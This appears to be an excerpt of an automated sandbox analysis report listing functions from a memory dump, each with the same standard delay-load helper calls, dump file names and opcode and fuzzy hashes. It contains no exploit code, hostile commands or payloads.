                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 5eaa14396ca395f27888c77059b97414af5fa03381aa39bfc526bf5f84d5b2d9
                                                                                              • Instruction ID: 9dc533f03b2c33e415ab770eef7c7bd8f20c34b52fa55abea59324d0b3547975
                                                                                              • Opcode Fuzzy Hash: 5eaa14396ca395f27888c77059b97414af5fa03381aa39bfc526bf5f84d5b2d9
                                                                                              • Instruction Fuzzy Hash: 90B012B627C202ECB10C61947E42D3B032CC4C0B11335851FF64DE40C4D7C05C094431
                                                                                              Function 0010D8D9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010D8A3
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 53bc3507dcb50063bc751259a4070dd76b89d8968e0b8d8718c5f51318d1134a
                                                                                              • Instruction ID: bf7c66674687040c75948558d2558834e1388c0c8d89ecabdb08cace1eea1f81
                                                                                              • Opcode Fuzzy Hash: 53bc3507dcb50063bc751259a4070dd76b89d8968e0b8d8718c5f51318d1134a
                                                                                              • Instruction Fuzzy Hash: C8A011B22AC003BCB00C22C0BC82C3A030CC8C0B20338C80AF08AA00C0ABC0280A0830
                                                                                              Function 0010D91F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010D8A3
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 49c4e2eb5c1ee94dcdb76be3b221e495f530c8fe5a7bdb28cd0a818cbf94d24f
                                                                                              • Instruction ID: bf7c66674687040c75948558d2558834e1388c0c8d89ecabdb08cace1eea1f81
                                                                                              • Opcode Fuzzy Hash: 49c4e2eb5c1ee94dcdb76be3b221e495f530c8fe5a7bdb28cd0a818cbf94d24f
                                                                                              • Instruction Fuzzy Hash: C8A011B22AC003BCB00C22C0BC82C3A030CC8C0B20338C80AF08AA00C0ABC0280A0830
                                                                                              Function 0010D93D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010D8A3
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: ec24574f7536239a4c999062505f83fa4e10b13148702a7df1346f2a8bd00020
                                                                                              • Instruction ID: bf7c66674687040c75948558d2558834e1388c0c8d89ecabdb08cace1eea1f81
                                                                                              • Opcode Fuzzy Hash: ec24574f7536239a4c999062505f83fa4e10b13148702a7df1346f2a8bd00020
                                                                                              • Instruction Fuzzy Hash: C8A011B22AC003BCB00C22C0BC82C3A030CC8C0B20338C80AF08AA00C0ABC0280A0830
                                                                                              Function 0010D951 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010D8A3
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 12dbb4ad2b92447c06b8637fc6b6e6f3634cad99d7b1af8cb828159f30d297a2
                                                                                              • Instruction ID: bf7c66674687040c75948558d2558834e1388c0c8d89ecabdb08cace1eea1f81
                                                                                              • Opcode Fuzzy Hash: 12dbb4ad2b92447c06b8637fc6b6e6f3634cad99d7b1af8cb828159f30d297a2
                                                                                              • Instruction Fuzzy Hash: C8A011B22AC003BCB00C22C0BC82C3A030CC8C0B20338C80AF08AA00C0ABC0280A0830
                                                                                              Function 0010D95B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010D8A3
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 7bf4dcd4626ab7b3c7da128d85e8ac3279b7041c66123dd57c2ef6e8451c30ae
                                                                                              • Instruction ID: bf7c66674687040c75948558d2558834e1388c0c8d89ecabdb08cace1eea1f81
                                                                                              • Opcode Fuzzy Hash: 7bf4dcd4626ab7b3c7da128d85e8ac3279b7041c66123dd57c2ef6e8451c30ae
                                                                                              • Instruction Fuzzy Hash: C8A011B22AC003BCB00C22C0BC82C3A030CC8C0B20338C80AF08AA00C0ABC0280A0830
                                                                                              Function 0010D979 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010D8A3
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: aa9bda131d6c5865c5c4d6b78e1cf19650426215bcf475ada45a3145d7de6386
                                                                                              • Instruction ID: bf7c66674687040c75948558d2558834e1388c0c8d89ecabdb08cace1eea1f81
                                                                                              • Opcode Fuzzy Hash: aa9bda131d6c5865c5c4d6b78e1cf19650426215bcf475ada45a3145d7de6386
                                                                                              • Instruction Fuzzy Hash: C8A011B22AC003BCB00C22C0BC82C3A030CC8C0B20338C80AF08AA00C0ABC0280A0830
                                                                                              Function 0010D965 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010D8A3
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: dc14316c27cc16ea9991916c464c65f61c12f256ba02181af9fbf91d010400fc
                                                                                              • Instruction ID: bf7c66674687040c75948558d2558834e1388c0c8d89ecabdb08cace1eea1f81
                                                                                              • Opcode Fuzzy Hash: dc14316c27cc16ea9991916c464c65f61c12f256ba02181af9fbf91d010400fc
                                                                                              • Instruction Fuzzy Hash: C8A011B22AC003BCB00C22C0BC82C3A030CC8C0B20338C80AF08AA00C0ABC0280A0830
                                                                                              Function 0010D96F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010D8A3
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: a34b6b9ec138904923fd235fbc1d011d92bdcf95c43edba7726aa847cfb52cfe
                                                                                              • Instruction ID: bf7c66674687040c75948558d2558834e1388c0c8d89ecabdb08cace1eea1f81
                                                                                              • Opcode Fuzzy Hash: a34b6b9ec138904923fd235fbc1d011d92bdcf95c43edba7726aa847cfb52cfe
                                                                                              • Instruction Fuzzy Hash: C8A011B22AC003BCB00C22C0BC82C3A030CC8C0B20338C80AF08AA00C0ABC0280A0830
                                                                                              Function 0010D997 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010D8A3
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 12650870bf1ac88bf560fd82abe0a3fe1fa4dbf897d2c9e594052decec8a47f1
                                                                                              • Instruction ID: bf7c66674687040c75948558d2558834e1388c0c8d89ecabdb08cace1eea1f81
                                                                                              • Opcode Fuzzy Hash: 12650870bf1ac88bf560fd82abe0a3fe1fa4dbf897d2c9e594052decec8a47f1
                                                                                              • Instruction Fuzzy Hash: C8A011B22AC003BCB00C22C0BC82C3A030CC8C0B20338C80AF08AA00C0ABC0280A0830
                                                                                              Function 0010D983 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010D8A3
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 341b8464856bb9a492f09e16160c0a0225aa11ebd7e92391752550041b1bc31b
                                                                                              • Instruction ID: bf7c66674687040c75948558d2558834e1388c0c8d89ecabdb08cace1eea1f81
                                                                                              • Opcode Fuzzy Hash: 341b8464856bb9a492f09e16160c0a0225aa11ebd7e92391752550041b1bc31b
                                                                                              • Instruction Fuzzy Hash: C8A011B22AC003BCB00C22C0BC82C3A030CC8C0B20338C80AF08AA00C0ABC0280A0830
                                                                                              Function 0010D98D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010D8A3
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 7bcedb1b468450a7eb4f7c3d654d8fb5b6682c3192ad2a7c800539d25dad4596
                                                                                              • Instruction ID: bf7c66674687040c75948558d2558834e1388c0c8d89ecabdb08cace1eea1f81
                                                                                              • Opcode Fuzzy Hash: 7bcedb1b468450a7eb4f7c3d654d8fb5b6682c3192ad2a7c800539d25dad4596
                                                                                              • Instruction Fuzzy Hash: C8A011B22AC003BCB00C22C0BC82C3A030CC8C0B20338C80AF08AA00C0ABC0280A0830
                                                                                              Function 0010DAA5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010DAB2
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: bd35311fc35e3b96ff59fb0778f9bea61cf43103d9994d1c8248d11f96477793
                                                                                              • Instruction ID: c9dd25aa0f38e1bc1d10b2950e352cb8ef46d4163826250ffdb82169ecb67e77
                                                                                              • Opcode Fuzzy Hash: bd35311fc35e3b96ff59fb0778f9bea61cf43103d9994d1c8248d11f96477793
                                                                                              • Instruction Fuzzy Hash: ACA011B23AC002BCB00CB2C2BC02C3A030CC0E0B22330820AB08AA00C8ABC0280A8832
                                                                                              Function 0010DAC0 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010DAB2
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 96001a44fc9355d0dca269d977177d0a3b1df2b28b9f57ceeaa449847f972ac2
                                                                                              • Instruction ID: 7d84ade529699a7ecf3d3d49b2dd078bcab4e4bb9755f9b059f874849567b813
                                                                                              • Opcode Fuzzy Hash: 96001a44fc9355d0dca269d977177d0a3b1df2b28b9f57ceeaa449847f972ac2
                                                                                              • Instruction Fuzzy Hash: 0FA011B22AC003FCB00C32C2BC02C3A030CC0C8B203308A0AB08A800C8ABC0280A8832
                                                                                              Function 0010DACA Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010DAB2
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
